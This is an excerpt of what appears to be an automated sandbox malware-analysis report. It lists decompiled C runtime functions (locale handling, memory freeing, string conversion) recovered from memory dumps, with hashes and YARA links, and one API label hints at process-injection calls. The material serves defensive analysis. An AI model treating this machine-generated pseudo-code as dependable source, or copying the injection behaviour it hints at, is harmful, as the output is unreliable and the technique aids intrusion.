                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ContextProcessThread$CreateMemoryRead
                                        • String ID:
                                        • API String ID: 3262821800-0
                                        • Opcode ID: fcb11bd34fb5e397019aadb9421415d548a0def76c5c51371d0bd8bdf6426090
                                        • Instruction ID: 64fa57fc59c32dd401c23dc3d1697a6563f817da3f37265da24063a7fccad709
                                        • Opcode Fuzzy Hash: fcb11bd34fb5e397019aadb9421415d548a0def76c5c51371d0bd8bdf6426090
                                        • Instruction Fuzzy Hash: A5C16D71D0021AAFEF11DFA8CD44FEDBBB9BF08304F148169E6A4B6190D774A945CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010808B6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExitProcess.KERNEL32(00000000), ref: 01080B52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: 5113b86b37df4b07ae03213fe012da79$D
                                        • API String ID: 621844428-89965315
                                        • Opcode ID: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction ID: 333118b19e4f91373b82d0cc3f80f84bfaae992b7b7fa1fa7313d46b8408ec30
                                        • Opcode Fuzzy Hash: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction Fuzzy Hash: 50916E30D1838CEEEF12DBE8D845BEDBBB5AF14704F10409AE584BA291D3B50A48DB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0106E84E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106E84E(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0106DB06(_t28, ?str?) != 0) {
					if(E0106DB06(_t28, ?str?) != 0) {
						return E0106FA26(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                        0x0106e852
                                        0x0106e857
                                        0x0106e87f
                                        0x00000000
                                        0x0106e8a8
                                        0x0106e89a
                                        0x0106e8c6
                                        0x00000000
                                        0x0106e8c6
                                        0x00000000
                                        0x0106e89c
                                        0x0106e8c4
                                        0x00000000
                                        0x00000000
                                        0x0106e8ca
                                        0x0106e8cf
                                        0x0106e8d3
                                        0x0106e8d3
                                        0x0106e8a1

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction ID: 12fd7acf0873c07d9608c5397906c1e96789aa8252d905b93fad9b2eabc73800
                                        • Opcode Fuzzy Hash: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction Fuzzy Hash: 83018035601306AEEB61DA5DD844EEA3BDC9F05660B148466FA8CEA155E730D5808790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01068E85, Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E01068E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E010632EE(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E010632EE(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E010632EE(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E0106899A( *_t42, 0x107e2e8);
								_t15 = E01069285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E010632B6();
									E0106363B( *_t42);
									E010634E1( *_t42);
									E010632B6(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E01063D75(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E010632B6( *_t42);
							E010632B6(_t42);
							L8:
							goto L3;
						}
						E010632B6(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E01064196(_t48))) = 0xc;
					goto L4;
				}
			}











                                        0x01068e8e
                                        0x01068eb4
                                        0x00000000
                                        0x01068e96
                                        0x01068ea1
                                        0x01068ea5
                                        0x01068ea7
                                        0x01068ec0
                                        0x01068ec5
                                        0x01068ec9
                                        0x01068ecb
                                        0x01068edc
                                        0x01068ee1
                                        0x01068ee6
                                        0x01068ee8
                                        0x01068f01
                                        0x01068f0e
                                        0x01068f16
                                        0x01068f19
                                        0x01068f1b
                                        0x01068f30
                                        0x01068f30
                                        0x01068f37
                                        0x01068f3e
                                        0x01068f44
                                        0x01068f4c
                                        0x01068f55
                                        0x00000000
                                        0x01068f55
                                        0x01068f1f
                                        0x01068f22
                                        0x01068f29
                                        0x01068f2b
                                        0x01068f53
                                        0x00000000
                                        0x01068f53
                                        0x01068f2d
                                        0x00000000
                                        0x01068f2d
                                        0x01068eec
                                        0x01068ef2
                                        0x01068ed3
                                        0x00000000
                                        0x01068ed3
                                        0x01068ece
                                        0x00000000
                                        0x01068ece
                                        0x01068ea9
                                        0x01068eae
                                        0x00000000
                                        0x01068eae

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction ID: afbdd92a562c442b85e8f65c81aa0ca17e4ce2b9ec2fcc4ccf0fcc0ae5777c7f
                                        • Opcode Fuzzy Hash: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction Fuzzy Hash: 8F21A135508713EAEB327F69DC01A8BBBEDEF61754B10846AE9CD99160EE328400C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106197C, Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E0106197C(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;
				intOrPtr _t39;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10c1b34);
				_t25 =  *0x10bfcfc; // 0x0
				_t24 = __eax;
				if(_t25 == 0) {
					L4:
					_push(_t14);
					E010632B6(_t25);
					_t26 =  *0x10bfcf8; // 0x14aaab0
					 *0x10bfcfc = 0;
					if(_t26 == 0) {
						L8:
						E010632B6(_t26);
						 *0x10bfcf8 = 0;
						E010632B6( *0x10bfcf4);
						_t5 = E010632B6( *0x10bfcf0);
						_t27 = _t26 | 0xffffffff;
						 *0x10bfcf4 = 0;
						 *0x10bfcf0 = 0;
						if(_t24 != _t27) {
							_t39 =  *0x10c1b34; // 0xc80d96c8
							if(_t39 != 0) {
								_t5 = E010632B6(_t24);
							}
						}
						__imp__EncodePointer(_t27);
						 *0x10c1b34 = _t5;
						_t6 =  *0x10c06f4; // 0x0
						if(_t6 != 0) {
							E010632B6(_t6);
							 *0x10c06f4 = 0;
						}
						_t7 =  *0x10c06f8; // 0x0
						if(_t7 != 0) {
							E010632B6(_t7);
							 *0x10c06f8 = 0;
						}
						_t8 =  *0x107e7d4; // 0x14b4fc8
						asm("lock xadd [eax], esi");
						if(_t27 != 1) {
							L18:
							return _t8;
						} else {
							_t8 =  *0x107e7d4; // 0x14b4fc8
							if(_t8 == 0x107e5b0) {
								goto L18;
							}
							_t9 = E010632B6(_t8);
							 *0x107e7d4 = 0x107e5b0;
							return _t9;
						}
					}
					while( *_t26 != 0) {
						E010632B6( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x10bfcf8; // 0x14aaab0
					goto L8;
				}
				while( *_t25 != 0) {
					E010632B6( *_t25);
					_t25 = _t25 + 4;
					if(_t25 != 0) {
						continue;
					}
					break;
				}
				_t25 =  *0x10bfcfc; // 0x0
				goto L4;
			}














                                        0x0106197c
                                        0x01061984
                                        0x0106198a
                                        0x01061990
                                        0x01061994
                                        0x010619ae
                                        0x010619ae
                                        0x010619b0
                                        0x010619b5
                                        0x010619bd
                                        0x010619c6
                                        0x010619df
                                        0x010619e0
                                        0x010619eb
                                        0x010619f1
                                        0x010619fc
                                        0x01061a01
                                        0x01061a04
                                        0x01061a0d
                                        0x01061a15
                                        0x01061a17
                                        0x01061a1d
                                        0x01061a20
                                        0x01061a25
                                        0x01061a1d
                                        0x01061a27
                                        0x01061a2d
                                        0x01061a32
                                        0x01061a39
                                        0x01061a3c
                                        0x01061a42
                                        0x01061a42
                                        0x01061a48
                                        0x01061a4f
                                        0x01061a52
                                        0x01061a58
                                        0x01061a58
                                        0x01061a5e
                                        0x01061a63
                                        0x01061a69
                                        0x01061a88
                                        0x01061a88
                                        0x01061a6b
                                        0x01061a6b
                                        0x01061a77
                                        0x00000000
                                        0x00000000
                                        0x01061a7a
                                        0x01061a80
                                        0x00000000
                                        0x01061a80
                                        0x01061a69
                                        0x010619c8
                                        0x010619ce
                                        0x010619d4
                                        0x010619d7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x010619d7
                                        0x010619d9
                                        0x00000000
                                        0x010619d9
                                        0x01061996
                                        0x0106199d
                                        0x010619a3
                                        0x010619a6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x010619a6
                                        0x010619a8
                                        0x00000000

                                        APIs
                                        • DecodePointer.KERNEL32 ref: 01061984
                                        • _free.LIBCMT ref: 0106199D
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • _free.LIBCMT ref: 010619B0
                                        • _free.LIBCMT ref: 010619CE
                                        • _free.LIBCMT ref: 010619E0
                                        • _free.LIBCMT ref: 010619F1
                                        • _free.LIBCMT ref: 010619FC
                                        • _free.LIBCMT ref: 01061A20
                                        • EncodePointer.KERNEL32(014AAAB0), ref: 01061A27
                                        • _free.LIBCMT ref: 01061A3C
                                        • _free.LIBCMT ref: 01061A52
                                        • _free.LIBCMT ref: 01061A7A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction ID: a17bde0e0b59de6b1cfcdf2f924f9eeba8bb176dc4785910cc9ca4401e96ef6d
                                        • Opcode Fuzzy Hash: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction Fuzzy Hash: 8F217E71D021538FD7719F58F9C0989BBE9BB4472032500AAEDD8A734DDE3A4884CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01068F5C, Relevance: 15.1, APIs: 10, Instructions: 131COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E01068F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E0106551B(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01064112(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x107cf88);
					E010627F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E010615FE();
						_v36 = _t88;
						E010636DB(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E010632EE(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E01063117(0xc);
							_v8 = 1;
							E0106899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E010690D1();
							_t66 = E01069285(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0106363B(_t83);
								_t43 = E010634E1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E0106DB06(_a8, 0x107e17c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x10c0a44 = 1;
									}
								}
								E01063117(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0106375B(_t25, _t83);
								E0106363B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x107ecf4 & 0x00000001;
									if(( *0x107ecf4 & 0x00000001) == 0) {
										E0106375B(0x107e2e4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x107e2e4; // 0x107e2e8
										_t32 = _t77 + 0x84; // 0x107ed00
										 *0x107ecf8 =  *_t32;
										_t33 = _t77 + 0x90; // 0x1079570
										 *0x107ed54 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x107e178 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E010690E0();
							}
						}
						_v8 = 0xfffffffe;
						E01069113(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E01064196(__eflags))) = 0x16;
						E010640E7();
						_t45 = 0;
					}
					return E01062835(_t45);
				}
				L20:
			}

















                                        0x01068f5c
                                        0x01068f5f
                                        0x01068f62
                                        0x01068f63
                                        0x01068f68
                                        0x01068f8c
                                        0x01068f8f
                                        0x01068f6a
                                        0x01068f6a
                                        0x01068f6b
                                        0x01068f6e
                                        0x01068f6e
                                        0x01068f79
                                        0x01068f7e
                                        0x01068f83
                                        0x00000000
                                        0x00000000
                                        0x01068f85
                                        0x01068f89
                                        0x00000000
                                        0x01068f8b
                                        0x00000000
                                        0x01068f8b
                                        0x00000000
                                        0x01068f89
                                        0x01068f90
                                        0x01068f91
                                        0x01068f92
                                        0x01068f93
                                        0x01068f94
                                        0x01068f95
                                        0x01068f9a
                                        0x01068f9b
                                        0x01068f9d
                                        0x01068fa2
                                        0x01068fa7
                                        0x01068fa9
                                        0x01068fac
                                        0x01068fb0
                                        0x01068fce
                                        0x01068fd0
                                        0x01068fd3
                                        0x01068fd8
                                        0x01068fdc
                                        0x01068fed
                                        0x01068fef
                                        0x01068ff2
                                        0x01068ff4
                                        0x01068ffc
                                        0x01069002
                                        0x0106900d
                                        0x01069014
                                        0x01069018
                                        0x0106902c
                                        0x0106902e
                                        0x01069031
                                        0x01069033
                                        0x010690ec
                                        0x010690f2
                                        0x01069039
                                        0x01069039
                                        0x0106903d
                                        0x01069047
                                        0x0106904e
                                        0x01069050
                                        0x01069052
                                        0x01069052
                                        0x01069050
                                        0x0106905e
                                        0x01069064
                                        0x0106906b
                                        0x01069070
                                        0x01069076
                                        0x0106907e
                                        0x01069082
                                        0x01069084
                                        0x0106908b
                                        0x01069095
                                        0x0106909c
                                        0x010690a2
                                        0x010690a8
                                        0x010690ad
                                        0x010690b3
                                        0x010690b8
                                        0x010690bb
                                        0x010690bb
                                        0x0106908b
                                        0x010690c0
                                        0x010690c4
                                        0x010690c4
                                        0x01069033
                                        0x010690f9
                                        0x01069100
                                        0x01069105
                                        0x01068fb2
                                        0x01068fb7
                                        0x01068fbd
                                        0x01068fc2
                                        0x01068fc2
                                        0x0106910c
                                        0x0106910c
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-0
                                        • Opcode ID: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction ID: 7e6ceb9876812edad1a307fdf46b70e193b28217f6050780d6eb8bdb4e589736
                                        • Opcode Fuzzy Hash: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction Fuzzy Hash: 9D41E632904306EFEB20AFA8D941BDD7BF9BF14314F10846EFA98AB181DB765541CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010617CB, Relevance: 15.1, APIs: 10, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E010617CB(void* __edx, char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				intOrPtr* _t7;
				intOrPtr _t9;
				short* _t10;
				short* _t12;
				short* _t14;
				int _t15;
				short* _t22;
				int _t24;
				void* _t27;
				void* _t31;
				short* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_push(_t27);
				_t24 = 0;
				_t36 = _a4;
				if(_a4 != 0) {
					_t33 = _a8;
					__eflags = _t33;
					if(__eflags == 0) {
						goto L1;
					}
					_t10 = E01062D64(_t27);
					__eflags = _t10;
					if(_t10 == 0) {
						_t22 = AreFileApisANSI();
						__eflags = _t22;
						if(_t22 == 0) {
							_t24 = 1;
							__eflags = 1;
						}
					}
					 *_t33 = 0;
					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
					_v8 = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E01063336(_t31, _t12 + _t12);
						 *_t33 = _t14;
						__eflags = _t14;
						if(_t14 == 0) {
							goto L9;
						}
						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
						__eflags = _t15;
						if(_t15 != 0) {
							_t9 = 1;
							__eflags = 1;
							goto L14;
						}
						E01064175(GetLastError());
						E010632B6( *_t33);
						 *_t33 =  *_t33 & 0x00000000;
						goto L8;
					} else {
						E01064175(GetLastError());
						L8:
						L9:
						_t9 = 0;
						L14:
						return _t9;
					}
				}
				L1:
				_t7 = E01064196(_t36);
				_t34 = 0x16;
				 *_t7 = _t34;
				E010640E7();
				_t9 = _t34;
				goto L14;
			}

















                                        0x010617cb
                                        0x010617ce
                                        0x010617d0
                                        0x010617d3
                                        0x010617d6
                                        0x010617ee
                                        0x010617f1
                                        0x010617f3
                                        0x00000000
                                        0x00000000
                                        0x010617f5
                                        0x010617fa
                                        0x010617fc
                                        0x010617fe
                                        0x01061804
                                        0x01061806
                                        0x0106180a
                                        0x0106180a
                                        0x0106180a
                                        0x01061806
                                        0x01061814
                                        0x01061818
                                        0x0106181e
                                        0x01061821
                                        0x01061823
                                        0x01061839
                                        0x0106183e
                                        0x01061841
                                        0x01061843
                                        0x00000000
                                        0x00000000
                                        0x01061851
                                        0x01061857
                                        0x01061859
                                        0x01061876
                                        0x01061876
                                        0x00000000
                                        0x01061876
                                        0x01061862
                                        0x01061869
                                        0x0106186e
                                        0x00000000
                                        0x01061825
                                        0x0106182c
                                        0x01061831
                                        0x01061832
                                        0x01061832
                                        0x01061877
                                        0x0106187c
                                        0x0106187c
                                        0x01061823
                                        0x010617d8
                                        0x010617d8
                                        0x010617df
                                        0x010617e0
                                        0x010617e2
                                        0x010617e7
                                        0x00000000

                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 010617F5
                                        • AreFileApisANSI.KERNEL32 ref: 010617FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061818
                                        • GetLastError.KERNEL32 ref: 01061825
                                        • __dosmaperr.LIBCMT ref: 0106182C
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: e50738c62fcd87c22c225eb81f16fbc9d868ecb19291925e627916a1f230de08
                                        • Instruction ID: d2bf931f15f0fea34c8563e5625d018a8aa35bb41f1268d121ebd0bfd51566b2
                                        • Opcode Fuzzy Hash: e50738c62fcd87c22c225eb81f16fbc9d868ecb19291925e627916a1f230de08
                                        • Instruction Fuzzy Hash: 71110DB1A04206FFEB726FB49C48A7E7BECEF54661B208569F9D5D5181EB35C800C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01061738, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E01061738(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E01061BC7(_t3);
				if(E01063268() != 0) {
					_t6 = E01062BEF(E01061493);
					 *0x107e000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E010632EE(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E010617AE();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E01062C4B( *0x107e000, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E01061685(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E010617AE();
					return 0;
				}
			}








                                        0x01061738
                                        0x01061744
                                        0x01061753
                                        0x01061758
                                        0x0106175e
                                        0x01061761
                                        0x00000000
                                        0x01061763
                                        0x01061770
                                        0x01061774
                                        0x01061776
                                        0x010617a5
                                        0x010617a5
                                        0x010617aa
                                        0x010617ad
                                        0x01061778
                                        0x01061786
                                        0x01061788
                                        0x00000000
                                        0x0106178a
                                        0x0106178a
                                        0x0106178c
                                        0x0106178d
                                        0x01061794
                                        0x0106179a
                                        0x0106179e
                                        0x010617a2
                                        0x010617a4
                                        0x010617a4
                                        0x01061788
                                        0x01061776
                                        0x01061746
                                        0x01061746
                                        0x01061746
                                        0x0106174d
                                        0x0106174d

                                        APIs
                                        • __init_pointers.LIBCMT ref: 01061738
                                          • Part of subcall function 01061BC7: RtlEncodePointer.NTDLL(00000000,?,0106173D,0106112C,0107CCC0,00000014), ref: 01061BCA
                                          • Part of subcall function 01061BC7: __initp_misc_winsig.LIBCMT ref: 01061BE5
                                          • Part of subcall function 01061BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01062DAE
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01062DC2
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01062DD5
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01062DE8
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01062DFB
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01062E0E
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01062E21
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01062E34
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01062E47
